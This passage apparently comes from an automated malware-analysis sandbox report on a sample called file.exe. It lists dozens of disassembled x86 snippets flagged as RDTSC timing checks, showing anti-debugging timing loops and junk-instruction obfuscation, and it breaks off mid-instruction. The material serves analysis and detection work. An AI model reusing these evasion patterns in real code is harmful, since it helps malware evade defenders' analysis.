                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A501 second address: 84A547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 jnc 00007F43A4BB4C26h 0x0000000e pop eax 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 js 00007F43A4BB4C3Ah 0x00000019 jmp 00007F43A4BB4C34h 0x0000001e pushad 0x0000001f push esi 0x00000020 pop esi 0x00000021 push ecx 0x00000022 pop ecx 0x00000023 jmp 00007F43A4BB4C33h 0x00000028 popad 0x00000029 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A547 second address: 84A55D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4FCF6A1h 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A694 second address: 84A6CD instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F43A4BB4C26h 0x00000008 jmp 00007F43A4BB4C36h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007F43A4BB4C34h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84A6CD second address: 84A6F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43A4FCF6A3h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F43A4FCF69Dh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E383 second address: 84E395 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F43A4BB4C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E395 second address: 84E399 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E399 second address: 84E39F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E39F second address: 84E3A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E3A5 second address: 84E3BE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C2Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E3BE second address: 84E3EA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F43A4FCF696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007F43A4FCF69Ch 0x00000010 popad 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F43A4FCF6A0h 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E46D second address: 84E47A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jbe 00007F43A4BB4C26h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E47A second address: 84E494 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 sub esi, dword ptr [ebp+122D288Fh] 0x0000000e push 00000000h 0x00000010 push FE4733C8h 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E494 second address: 84E49B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E49B second address: 84E4EB instructions: 0x00000000 rdtsc 0x00000002 jns 00007F43A4FCF698h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 01B8CCB8h 0x00000011 mov edi, dword ptr [ebp+122D2B3Bh] 0x00000017 push 00000003h 0x00000019 movzx edx, cx 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007F43A4FCF69Dh 0x00000024 add edx, 2C30A960h 0x0000002a pop esi 0x0000002b pop esi 0x0000002c push 00000003h 0x0000002e mov dword ptr [ebp+122D2CF6h], esi 0x00000034 call 00007F43A4FCF699h 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c jne 00007F43A4FCF696h 0x00000042 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E4EB second address: 84E4EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E4EF second address: 84E4FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E4FC second address: 84E500 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E500 second address: 84E51E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jmp 00007F43A4FCF69Bh 0x00000010 mov eax, dword ptr [eax] 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pushad 0x00000016 popad 0x00000017 pop esi 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E51E second address: 84E53A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F43A4BB4C2Ch 0x00000008 jo 00007F43A4BB4C26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 pushad 0x00000015 push eax 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 pop eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E53A second address: 84E590 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 pop eax 0x00000007 push 00000000h 0x00000009 push ecx 0x0000000a call 00007F43A4FCF698h 0x0000000f pop ecx 0x00000010 mov dword ptr [esp+04h], ecx 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc ecx 0x0000001d push ecx 0x0000001e ret 0x0000001f pop ecx 0x00000020 ret 0x00000021 mov ecx, 6AC52998h 0x00000026 lea ebx, dword ptr [ebp+1245328Bh] 0x0000002c stc 0x0000002d jbe 00007F43A4FCF6AAh 0x00000033 push eax 0x00000034 js 00007F43A4FCF6A0h 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E658 second address: 84E68F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F43A4BB4C28h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [esp+04h] 0x00000010 jne 00007F43A4BB4C3Bh 0x00000016 mov eax, dword ptr [eax] 0x00000018 push eax 0x00000019 push edx 0x0000001a jnc 00007F43A4BB4C28h 0x00000020 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E68F second address: 84E6D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F43A4FCF6A4h 0x00000008 jmp 00007F43A4FCF6A9h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F43A4FCF6A0h 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E7BB second address: 84E83E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 mov dword ptr [ebp+122D1B53h], edi 0x0000000d push 00000000h 0x0000000f jnc 00007F43A4BB4C2Ch 0x00000015 push 5B9623BAh 0x0000001a jng 00007F43A4BB4C2Ch 0x00000020 xor dword ptr [esp], 5B96233Ah 0x00000027 add cl, FFFFFF8Bh 0x0000002a push 00000003h 0x0000002c push 00000000h 0x0000002e push ecx 0x0000002f call 00007F43A4BB4C28h 0x00000034 pop ecx 0x00000035 mov dword ptr [esp+04h], ecx 0x00000039 add dword ptr [esp+04h], 0000001Ah 0x00000041 inc ecx 0x00000042 push ecx 0x00000043 ret 0x00000044 pop ecx 0x00000045 ret 0x00000046 push 00000000h 0x00000048 or dword ptr [ebp+122D279Bh], edi 0x0000004e push 00000003h 0x00000050 mov dword ptr [ebp+122D557Bh], ebx 0x00000056 push 409ABFFDh 0x0000005b push eax 0x0000005c push edx 0x0000005d jmp 00007F43A4BB4C32h 0x00000062 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E83E second address: 84E843 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E843 second address: 84E8DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 add dword ptr [esp], 7F654003h 0x00000010 mov esi, dword ptr [ebp+122D2B9Bh] 0x00000016 pushad 0x00000017 jnl 00007F43A4BB4C2Bh 0x0000001d jmp 00007F43A4BB4C2Ch 0x00000022 popad 0x00000023 lea ebx, dword ptr [ebp+1245329Fh] 0x00000029 push 00000000h 0x0000002b push edx 0x0000002c call 00007F43A4BB4C28h 0x00000031 pop edx 0x00000032 mov dword ptr [esp+04h], edx 0x00000036 add dword ptr [esp+04h], 0000001Dh 0x0000003e inc edx 0x0000003f push edx 0x00000040 ret 0x00000041 pop edx 0x00000042 ret 0x00000043 xchg eax, ebx 0x00000044 pushad 0x00000045 jmp 00007F43A4BB4C34h 0x0000004a jmp 00007F43A4BB4C35h 0x0000004f popad 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 pushad 0x00000054 jg 00007F43A4BB4C26h 0x0000005a jl 00007F43A4BB4C26h 0x00000060 popad 0x00000061 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 84E8DA second address: 84E8E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86EA48 second address: 86EA4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86CB5D second address: 86CB63 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86CF79 second address: 86CF7E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86D0FE second address: 86D106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86D106 second address: 86D10C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86D10C second address: 86D12B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop ecx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e je 00007F43A4FCF6B0h 0x00000014 jns 00007F43A4FCF698h 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86D29A second address: 86D2B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C36h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86D2B4 second address: 86D2BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86D3FF second address: 86D405 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86D563 second address: 86D567 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86D6E9 second address: 86D6FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 jmp 00007F43A4BB4C2Ah 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86D9D5 second address: 86DA06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4FCF6A7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a jmp 00007F43A4FCF6A4h 0x0000000f pop edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E30C second address: 86E331 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jng 00007F43A4BB4C3Ah 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E331 second address: 86E337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E337 second address: 86E33C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E48D second address: 86E495 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E5CE second address: 86E5D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 86E5D4 second address: 86E5F5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4FCF6A8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872880 second address: 872885 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 872885 second address: 8728A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F43A4FCF6A4h 0x00000009 pushad 0x0000000a popad 0x0000000b jg 00007F43A4FCF696h 0x00000011 popad 0x00000012 push ecx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 874D7F second address: 874DAD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e pushad 0x0000000f push edi 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop edi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F43A4BB4C39h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 874DAD second address: 874DF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4FCF69Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e js 00007F43A4FCF6A3h 0x00000014 jmp 00007F43A4FCF69Dh 0x00000019 mov eax, dword ptr [eax] 0x0000001b jmp 00007F43A4FCF6A3h 0x00000020 mov dword ptr [esp+04h], eax 0x00000024 push eax 0x00000025 push edx 0x00000026 push ebx 0x00000027 jo 00007F43A4FCF696h 0x0000002d pop ebx 0x0000002e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 874DF6 second address: 874DFB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83BC08 second address: 83BC12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F43A4FCF696h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83BC12 second address: 83BC1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83BC1C second address: 83BC3C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4FCF6A7h 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 83BC3C second address: 83BC56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F43A4BB4C26h 0x0000000a jmp 00007F43A4BB4C2Eh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 879226 second address: 87922C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87922C second address: 879231 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 879231 second address: 87923D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 js 00007F43A4FCF696h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87923D second address: 87924B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnp 00007F43A4BB4C26h 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8793E6 second address: 8793EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 879596 second address: 8795B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C37h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8799A8 second address: 8799AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 879AF2 second address: 879AF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 879AF6 second address: 879AFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87A96C second address: 87A970 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87AFD1 second address: 87AFD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87B231 second address: 87B235 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87B235 second address: 87B23B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87B23B second address: 87B23F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87B4FA second address: 87B508 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F43A4FCF696h 0x0000000a popad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87B6C3 second address: 87B6C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87C4A9 second address: 87C4AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87CD7C second address: 87CD80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87CD80 second address: 87CD86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 87F867 second address: 87F86B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8801D6 second address: 880238 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F43A4FCF696h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jng 00007F43A4FCF698h 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F43A4FCF698h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000019h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 mov edi, dword ptr [ebp+122D2D0Dh] 0x00000036 push 00000000h 0x00000038 sub dword ptr [ebp+12453B11h], eax 0x0000003e push 00000000h 0x00000040 call 00007F43A4FCF69Bh 0x00000045 push esi 0x00000046 jl 00007F43A4FCF696h 0x0000004c pop edi 0x0000004d pop esi 0x0000004e xchg eax, ebx 0x0000004f push eax 0x00000050 push edx 0x00000051 push ecx 0x00000052 pushad 0x00000053 popad 0x00000054 pop ecx 0x00000055 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 880238 second address: 88025C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43A4BB4C36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 88025C second address: 880260 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 880C60 second address: 880C92 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F43A4BB4C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jg 00007F43A4BB4C26h 0x00000011 push eax 0x00000012 pop eax 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F43A4BB4C38h 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 8809FF second address: 880A04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 880C92 second address: 880C96 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 880C96 second address: 880C9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 885A49 second address: 885ABA instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F43A4BB4C26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b jnp 00007F43A4BB4C26h 0x00000011 pop edi 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 push 00000000h 0x00000018 push ecx 0x00000019 call 00007F43A4BB4C28h 0x0000001e pop ecx 0x0000001f mov dword ptr [esp+04h], ecx 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc ecx 0x0000002c push ecx 0x0000002d ret 0x0000002e pop ecx 0x0000002f ret 0x00000030 mov ebx, dword ptr [ebp+122D29B7h] 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push ebx 0x0000003b call 00007F43A4BB4C28h 0x00000040 pop ebx 0x00000041 mov dword ptr [esp+04h], ebx 0x00000045 add dword ptr [esp+04h], 0000001Ch 0x0000004d inc ebx 0x0000004e push ebx 0x0000004f ret 0x00000050 pop ebx 0x00000051 ret 0x00000052 push 00000000h 0x00000054 add di, C14Ah 0x00000059 xchg 